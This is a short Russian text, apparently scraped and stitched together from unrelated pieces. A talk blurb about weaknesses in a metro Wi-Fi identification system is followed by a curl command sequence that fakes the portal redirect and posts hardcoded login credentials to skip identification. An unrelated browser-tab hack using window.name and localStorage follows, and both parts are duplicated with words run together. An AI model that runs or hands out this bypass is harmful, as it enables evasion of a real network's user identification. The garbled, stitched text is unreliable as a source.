Георгий Носеевич расскажет об особенностях реализации и о слабых ее местах. Слушатели узнают о том, как злоумышленники могут перехитрить систему идентификации
Путем отправки curl http://authrad.vmet.ro/?switch_url=http://1.1.1.1/login.html&client_mac=80:e6:50:XX:XX:XX && curl --data "buttonClicked=4&username=mosmetro&password=gfhjkm" http://1.1.1.1/login.html?
На этот случай есть хак:
При открытии вкладки (или по другому событию) она меняет свой window.name на какую-нибудь псевдо-уникальную строку и отсылает её через localStorage. Другие вкладки (если есть) ловят onstorage и запускают var hWnd = window.open("", "{{имя окна}}"), получая ссылку на её window.
Тут есть, конечно, куча ограничений, и самое главное из них — мобильный сафари, он замораживает неактивную вкладку, так что onstorage (и, если мне не изменяет память, даже банальный setTimeout) не выполнится, пока она не станет активной. Выходом из этого могли бы быть Shared Workers, но они тоже были выпилены из этого чудесного браузера.
Путем отправки
curl http://authrad.vmet.ro/?switch_url=http://1.1.1.1/login.html&client_mac=80:e6:50:XX:XX:XX && curl --data "buttonClicked=4&username=mosmetro&password=gfhjkm" http://1.1.1.1/login.html?При открытии вкладки (или по другому событию) она меняет свой
window.nameна какую-нибудь псевдо-уникальную строку и отсылает её через localStorage. Другие вкладки (если есть) ловят onstorage и запускаютvar hWnd = window.open("", "{{имя окна}}"), получая ссылку на её window.Тут есть, конечно, куча ограничений, и самое главное из них — мобильный сафари, он замораживает неактивную вкладку, так что onstorage (и, если мне не изменяет память, даже банальный setTimeout) не выполнится, пока она не станет активной. Выходом из этого могли бы быть Shared Workers, но они тоже были выпилены из этого чудесного браузера.